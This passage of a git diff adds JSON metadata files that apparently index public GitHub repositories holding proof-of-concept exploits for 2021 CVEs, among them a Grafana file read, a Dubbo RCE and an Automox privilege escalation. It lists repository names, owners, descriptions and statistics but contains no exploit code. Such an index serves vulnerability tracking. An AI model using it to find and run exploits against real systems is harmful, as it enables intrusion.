+ "updated_at": "2023-05-23T08:11:40Z",
+ "pushed_at": "2021-11-26T01:54:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43287.json b/2021/CVE-2021-43287.json
new file mode 100644
index 0000000000..6934518cdc
--- /dev/null
+++ b/2021/CVE-2021-43287.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 489551378,
+ "name": "CVE-2021-43287",
+ "full_name": "Wrin9\/CVE-2021-43287",
+ "owner": {
+ "login": "Wrin9",
+ "id": 54984589,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4",
+ "html_url": "https:\/\/github.com\/Wrin9"
+ },
+ "html_url": "https:\/\/github.com\/Wrin9\/CVE-2021-43287",
+ "description": "CVE-2021-43287_GoCD_fileread_POC_EXP",
+ "fork": false,
+ "created_at": "2022-05-07T02:54:59Z",
+ "updated_at": "2022-08-15T15:42:23Z",
+ "pushed_at": "2022-05-16T01:44:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43297.json b/2021/CVE-2021-43297.json
new file mode 100644
index 0000000000..57bacc44d2
--- /dev/null
+++ b/2021/CVE-2021-43297.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 448884093,
+ "name": "CVE-2021-43297-POC",
+ "full_name": "bitterzzZZ\/CVE-2021-43297-POC",
+ "owner": {
+ "login": "bitterzzZZ",
+ "id": 44869820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44869820?v=4",
+ "html_url": "https:\/\/github.com\/bitterzzZZ"
+ },
+ "html_url": "https:\/\/github.com\/bitterzzZZ\/CVE-2021-43297-POC",
+ "description": "CVE-2021-43297 POC,Apache Dubbo<= 2.7.13时可以实现RCE",
+ "fork": false,
+ "created_at": "2022-01-17T12:26:18Z",
+ "updated_at": "2023-12-11T06:17:39Z",
+ "pushed_at": "2022-01-24T11:24:56Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 448994557,
+ "name": "Apache-Dubbo-Hessian2-CVE-2021-43297",
+ "full_name": "longofo\/Apache-Dubbo-Hessian2-CVE-2021-43297",
+ "owner": {
+ "login": "longofo",
+ "id": 19823813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19823813?v=4",
+ "html_url": "https:\/\/github.com\/longofo"
+ },
+ "html_url": "https:\/\/github.com\/longofo\/Apache-Dubbo-Hessian2-CVE-2021-43297",
+ "description": "Apache Dubbo Hessian2 CVE-2021-43297 demo",
+ "fork": false,
+ "created_at": "2022-01-17T17:52:34Z",
+ "updated_at": "2023-06-11T12:04:19Z",
+ "pushed_at": "2022-01-18T03:43:51Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43326.json b/2021/CVE-2021-43326.json
new file mode 100644
index 0000000000..9e2c3baa98
--- /dev/null
+++ b/2021/CVE-2021-43326.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437963336,
+ "name": "CVE-2021-43326_Exploit",
+ "full_name": "gfoss\/CVE-2021-43326_Exploit",
+ "owner": {
+ "login": "gfoss",
+ "id": 727732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727732?v=4",
+ "html_url": "https:\/\/github.com\/gfoss"
+ },
+ "html_url": "https:\/\/github.com\/gfoss\/CVE-2021-43326_Exploit",
+ "description": ":boom: Automox Windows Agent Privilege Escalation Exploit",
+ "fork": false,
+ "created_at": "2021-12-13T17:26:28Z",
+ "updated_at": "2024-02-24T11:42:37Z",
+ "pushed_at": "2022-01-06T20:49:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43408.json b/2021/CVE-2021-43408.json
new file mode 100644
index 0000000000..928599c6f4
--- /dev/null
+++ b/2021/CVE-2021-43408.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 498166996,
+ "name": "CVE-2021-43408",
+ "full_name": "tuannq2299\/CVE-2021-43408",
+ "owner": {
+ "login": "tuannq2299",
+ "id": 66456080,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66456080?v=4",
+ "html_url": "https:\/\/github.com\/tuannq2299"
+ },
+ "html_url": "https:\/\/github.com\/tuannq2299\/CVE-2021-43408",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-31T03:00:27Z",
+ "updated_at": "2022-05-31T03:17:53Z",
+ "pushed_at": "2022-05-31T04:14:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43469.json b/2021/CVE-2021-43469.json
new file mode 100644
index 0000000000..8065f39b97
--- /dev/null
+++ b/2021/CVE-2021-43469.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424084977,
+ "name": "CVE-2021-43469",
+ "full_name": "badboycxcc\/CVE-2021-43469",
+ "owner": {
+ "login": "badboycxcc",
+ "id": 72059221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4",
+ "html_url": "https:\/\/github.com\/badboycxcc"
+ },
+ "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-43469",
+ "description": "CVE-2021-43469",
+ "fork": false,
+ "created_at": "2021-11-03T03:54:14Z",
+ "updated_at": "2021-12-08T09:19:26Z",
+ "pushed_at": "2021-12-06T12:21:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43471.json b/2021/CVE-2021-43471.json
new file mode 100644
index 0000000000..db07f68b58
--- /dev/null
+++ b/2021/CVE-2021-43471.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424179332,
+ "name": "CVE-2021-43471",
+ "full_name": "cxaqhq\/CVE-2021-43471",
+ "owner": {
+ "login": "cxaqhq",
+ "id": 32918546,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918546?v=4",
+ "html_url": "https:\/\/github.com\/cxaqhq"
+ },
+ "html_url": "https:\/\/github.com\/cxaqhq\/CVE-2021-43471",
+ "description": "CVE-2021-43471",
+ "fork": false,
+ "created_at": "2021-11-03T10:27:16Z",
+ "updated_at": "2021-12-06T12:19:51Z",
+ "pushed_at": "2021-12-06T12:19:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43503.json b/2021/CVE-2021-43503.json
new file mode 100644
index 0000000000..71d0f30513
--- /dev/null
+++ b/2021/CVE-2021-43503.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 424901298,
+ "name": "Laravel-vul",
+ "full_name": "guoyanan1g\/Laravel-vul",
+ "owner": {
+ "login": "guoyanan1g",
+ "id": 64716083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64716083?v=4",
+ "html_url": "https:\/\/github.com\/guoyanan1g"
+ },
+ "html_url": "https:\/\/github.com\/guoyanan1g\/Laravel-vul",
+ "description": "个人挖掘出来的漏洞CVE-2021-43503",
+ "fork": false,
+ "created_at": "2021-11-05T09:59:34Z",
+ "updated_at": "2023-10-07T03:57:30Z",
+ "pushed_at": "2023-11-07T03:06:13Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 495059690,
+ "name": "CVE-2021-43503",
+ "full_name": "kang8\/CVE-2021-43503",
+ "owner": {
+ "login": "kang8",
+ "id": 36906329,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36906329?v=4",
+ "html_url": "https:\/\/github.com\/kang8"
+ },
+ "html_url": "https:\/\/github.com\/kang8\/CVE-2021-43503",
+ "description": "Case for CVE-2021-43503",
+ "fork": false,
+ "created_at": "2022-05-22T12:54:39Z",
+ "updated_at": "2022-05-23T06:30:51Z",
+ "pushed_at": "2022-08-23T01:09:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43515.json b/2021/CVE-2021-43515.json
new file mode 100644
index 0000000000..136073cab4
--- /dev/null
+++ b/2021/CVE-2021-43515.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483326677,
+ "name": "CVE-2021-43515",
+ "full_name": "ixSly\/CVE-2021-43515",
+ "owner": {
+ "login": "ixSly",
+ "id": 32583633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32583633?v=4",
+ "html_url": "https:\/\/github.com\/ixSly"
+ },
+ "html_url": "https:\/\/github.com\/ixSly\/CVE-2021-43515",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-19T16:35:57Z",
+ "updated_at": "2022-04-19T16:35:57Z",
+ "pushed_at": "2022-04-19T16:40:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43530.json b/2021/CVE-2021-43530.json
new file mode 100644
index 0000000000..55f4cc9a1b
--- /dev/null
+++ b/2021/CVE-2021-43530.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 472651368,
+ "name": "CVE-2021-43530-UXSS-On-QRcode-Reader-",
+ "full_name": "hfh86\/CVE-2021-43530-UXSS-On-QRcode-Reader-",
+ "owner": {
+ "login": "hfh86",
+ "id": 42328886,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42328886?v=4",
+ "html_url": "https:\/\/github.com\/hfh86"
+ },
+ "html_url": "https:\/\/github.com\/hfh86\/CVE-2021-43530-UXSS-On-QRcode-Reader-",
+ "description": "CVE-2021-43530 A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94.",
+ "fork": false,
+ "created_at": "2022-03-22T07:07:42Z",
+ "updated_at": "2022-08-13T13:05:47Z",
+ "pushed_at": "2022-08-11T07:23:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43557.json b/2021/CVE-2021-43557.json
new file mode 100644
index 0000000000..b732c0573b
--- /dev/null
+++ b/2021/CVE-2021-43557.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 430853881,
+ "name": "k8s-CVE-2021-43557-poc",
+ "full_name": "xvnpw\/k8s-CVE-2021-43557-poc",
+ "owner": {
+ "login": "xvnpw",
+ "id": 17719543,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17719543?v=4",
+ "html_url": "https:\/\/github.com\/xvnpw"
+ },
+ "html_url": "https:\/\/github.com\/xvnpw\/k8s-CVE-2021-43557-poc",
+ "description": "PoC for CVE-2021-43557",
+ "fork": false,
+ "created_at": "2021-11-22T20:23:05Z",
+ "updated_at": "2023-09-27T02:52:49Z",
+ "pushed_at": "2021-11-22T20:24:32Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43609.json b/2021/CVE-2021-43609.json
new file mode 100644
index 0000000000..e2af84ad9b
--- /dev/null
+++ b/2021/CVE-2021-43609.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 715293183,
+ "name": "CVE-2021-43609-POC",
+ "full_name": "d5sec\/CVE-2021-43609-POC",
+ "owner": {
+ "login": "d5sec",
+ "id": 127467140,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127467140?v=4",
+ "html_url": "https:\/\/github.com\/d5sec"
+ },
+ "html_url": "https:\/\/github.com\/d5sec\/CVE-2021-43609-POC",
+ "description": "Proof of Concept Exploit for CVE-2021-43609",
+ "fork": false,
+ "created_at": "2023-11-06T21:13:21Z",
+ "updated_at": "2023-11-11T17:57:10Z",
+ "pushed_at": "2023-11-07T04:11:28Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43616.json b/2021/CVE-2021-43616.json
new file mode 100644
index 0000000000..b28db59380
--- /dev/null
+++ b/2021/CVE-2021-43616.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 428081760,
+ "name": "CVE-2021-43616",
+ "full_name": "icatalina\/CVE-2021-43616",
+ "owner": {
+ "login": "icatalina",
+ "id": 4542735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4542735?v=4",
+ "html_url": "https:\/\/github.com\/icatalina"
+ },
+ "html_url": "https:\/\/github.com\/icatalina\/CVE-2021-43616",
+ "description": "Repo demonstrating CVE-2021-43616 \/ https:\/\/github.com\/npm\/cli\/issues\/2701",
+ "fork": false,
+ "created_at": "2021-11-15T01:06:10Z",
+ "updated_at": "2022-04-12T02:59:18Z",
+ "pushed_at": "2021-11-15T01:06:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43617.json b/2021/CVE-2021-43617.json
new file mode 100644
index 0000000000..2350995dbc
--- /dev/null
+++ b/2021/CVE-2021-43617.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 429682292,
+ "name": "CVE-2021-43617",
+ "full_name": "kombat1\/CVE-2021-43617",
+ "owner": {
+ "login": "kombat1",
+ "id": 28701873,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28701873?v=4",
+ "html_url": "https:\/\/github.com\/kombat1"
+ },
+ "html_url": "https:\/\/github.com\/kombat1\/CVE-2021-43617",
+ "description": "CVE-2021-43617 bypass CRF",
+ "fork": false,
+ "created_at": "2021-11-19T05:39:25Z",
+ "updated_at": "2023-01-10T03:23:18Z",
+ "pushed_at": "2021-11-22T12:38:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 520832418,
+ "name": "CVE-2021-43617",
+ "full_name": "aweiiy\/CVE-2021-43617",
+ "owner": {
+ "login": "aweiiy",
+ "id": 20345925,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20345925?v=4",
+ "html_url": "https:\/\/github.com\/aweiiy"
+ },
+ "html_url": "https:\/\/github.com\/aweiiy\/CVE-2021-43617",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-03T10:18:44Z",
+ "updated_at": "2022-08-03T10:19:52Z",
+ "pushed_at": "2022-08-03T10:19:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 650974335,
+ "name": "CVE-2021-43617",
+ "full_name": "Sybelle03\/CVE-2021-43617",
+ "owner": {
+ "login": "Sybelle03",
+ "id": 107751839,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107751839?v=4",
+ "html_url": "https:\/\/github.com\/Sybelle03"
+ },
+ "html_url": "https:\/\/github.com\/Sybelle03\/CVE-2021-43617",
+ "description": "This is a reproduction of PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) vulnerability",
+ "fork": false,
+ "created_at": "2023-06-08T08:05:36Z",
+ "updated_at": "2023-06-08T08:35:51Z",
+ "pushed_at": "2023-06-08T08:38:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43657.json b/2021/CVE-2021-43657.json
new file mode 100644
index 0000000000..a9f496c7ba
--- /dev/null
+++ b/2021/CVE-2021-43657.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 563148797,
+ "name": "CVE-2021-43657",
+ "full_name": "c0n5n3d\/CVE-2021-43657",
+ "owner": {
+ "login": "c0n5n3d",
+ "id": 40382877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40382877?v=4",
+ "html_url": "https:\/\/github.com\/c0n5n3d"
+ },
+ "html_url": "https:\/\/github.com\/c0n5n3d\/CVE-2021-43657",
+ "description": "This is a reference\/POC for CVE-2021-43657",
+ "fork": false,
+ "created_at": "2022-11-08T02:13:29Z",
+ "updated_at": "2024-01-17T06:36:25Z",
+ "pushed_at": "2022-11-26T08:09:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43778.json b/2021/CVE-2021-43778.json
new file mode 100644
index 0000000000..6e5a10f4a7
--- /dev/null
+++ b/2021/CVE-2021-43778.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 433348602,
+ "name": "CVE-2021-43778",
+ "full_name": "AK-blank\/CVE-2021-43778",
+ "owner": {
+ "login": "AK-blank",
+ "id": 56591429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4",
+ "html_url": "https:\/\/github.com\/AK-blank"
+ },
+ "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-43778",
+ "description": " CVE-2021-43778 poc",
+ "fork": false,
+ "created_at": "2021-11-30T08:19:24Z",
+ "updated_at": "2021-12-03T00:25:20Z",
+ "pushed_at": "2021-11-30T08:20:43Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43789.json b/2021/CVE-2021-43789.json
new file mode 100644
index 0000000000..4bc8d5fa3f
--- /dev/null
+++ b/2021/CVE-2021-43789.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 452890200,
+ "name": "CVE-2021-43789",
+ "full_name": "numanturle\/CVE-2021-43789",
+ "owner": {
+ "login": "numanturle",
+ "id": 7007951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
+ "html_url": "https:\/\/github.com\/numanturle"
+ },
+ "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-43789",
+ "description": "Prestashop >= 1.7.5.0 < 1.7.8.2 - SQL injection",
+ "fork": false,
+ "created_at": "2022-01-28T00:26:40Z",
+ "updated_at": "2024-03-23T06:01:36Z",
+ "pushed_at": "2022-01-28T00:27:12Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43798.json b/2021/CVE-2021-43798.json
new file mode 100644
index 0000000000..386b25e7b0
--- /dev/null
+++ b/2021/CVE-2021-43798.json
@@ -0,0 +1,1363 @@
+[
+ {
+ "id": 435633141,
+ "name": "CVE-2021-43798",
+ "full_name": "taythebot\/CVE-2021-43798",
+ "owner": {
+ "login": "taythebot",
+ "id": 60461479,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4",
+ "html_url": "https:\/\/github.com\/taythebot"
+ },
+ "html_url": "https:\/\/github.com\/taythebot\/CVE-2021-43798",
+ "description": "CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)",
+ "fork": false,
+ "created_at": "2021-12-06T20:10:23Z",
+ "updated_at": "2024-04-25T23:37:12Z",
+ "pushed_at": "2021-12-07T18:09:20Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 435809070,
+ "name": "CVE-2021-43798",
+ "full_name": "zer0yu\/CVE-2021-43798",
+ "owner": {
+ "login": "zer0yu",
+ "id": 16551733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16551733?v=4",
+ "html_url": "https:\/\/github.com\/zer0yu"
+ },
+ "html_url": "https:\/\/github.com\/zer0yu\/CVE-2021-43798",
+ "description": "Grafana Arbitrary File Reading Vulnerability",
+ "fork": false,
+ "created_at": "2021-12-07T08:59:11Z",
+ "updated_at": "2024-03-25T16:55:01Z",
+ "pushed_at": "2021-12-07T14:18:42Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 435810052,
+ "name": "Grafana-CVE-2021-43798",
+ "full_name": "jas502n\/Grafana-CVE-2021-43798",
+ "owner": {
+ "login": "jas502n",
+ "id": 16593068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4",
+ "html_url": "https:\/\/github.com\/jas502n"
+ },
+ "html_url": "https:\/\/github.com\/jas502n\/Grafana-CVE-2021-43798",
+ "description": "Grafana Unauthorized arbitrary file reading vulnerability",
+ "fork": false,
+ "created_at": "2021-12-07T09:02:16Z",
+ "updated_at": "2024-06-16T08:02:55Z",
+ "pushed_at": "2023-02-14T07:05:22Z",
+ "stargazers_count": 350,
+ "watchers_count": 350,
+ "has_discussions": false,
+ "forks_count": 90,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 90,
+ "watchers": 350,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 435840491,
+ "name": "CVE-2021-43798-Grafana-POC",
+ "full_name": "ScorpionsMAX\/CVE-2021-43798-Grafana-POC",
+ "owner": {
+ "login": "ScorpionsMAX",
+ "id": 95686853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95686853?v=4",
+ "html_url": "https:\/\/github.com\/ScorpionsMAX"
+ },
+ "html_url": "https:\/\/github.com\/ScorpionsMAX\/CVE-2021-43798-Grafana-POC",
+ "description": "CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数",
+ "fork": false,
+ "created_at": "2021-12-07T10:43:30Z",
+ "updated_at": "2022-09-22T13:45:05Z",
+ "pushed_at": "2021-12-17T02:57:41Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435877595,
+ "name": "CVE-2021-43798",
+ "full_name": "Mr-xn\/CVE-2021-43798",
+ "owner": {
+ "login": "Mr-xn",
+ "id": 18260135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
+ "html_url": "https:\/\/github.com\/Mr-xn"
+ },
+ "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2021-43798",
+ "description": "CVE-2021-43798:Grafana 任意文件读取漏洞",
+ "fork": false,
+ "created_at": "2021-12-07T12:47:58Z",
+ "updated_at": "2024-05-21T08:51:36Z",
+ "pushed_at": "2021-12-07T16:27:56Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43798",
+ "grafana",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 435904073,
+ "name": "CVE-2021-43798-Grafana-Exp",
+ "full_name": "asaotomo\/CVE-2021-43798-Grafana-Exp",
+ "owner": {
+ "login": "asaotomo",
+ "id": 67818638,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67818638?v=4",
+ "html_url": "https:\/\/github.com\/asaotomo"
+ },
+ "html_url": "https:\/\/github.com\/asaotomo\/CVE-2021-43798-Grafana-Exp",
+ "description": "Grafanav8.*版本任意文件读取漏洞批量检测工具:该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。",
+ "fork": false,
+ "created_at": "2021-12-07T14:06:26Z",
+ "updated_at": "2024-05-11T05:59:13Z",
+ "pushed_at": "2021-12-23T15:51:01Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": true,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43798",
+ "exp",
+ "grafana"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435926848,
+ "name": "grafanaExp",
+ "full_name": "A-D-Team\/grafanaExp",
+ "owner": {
+ "login": "A-D-Team",
+ "id": 94842031,
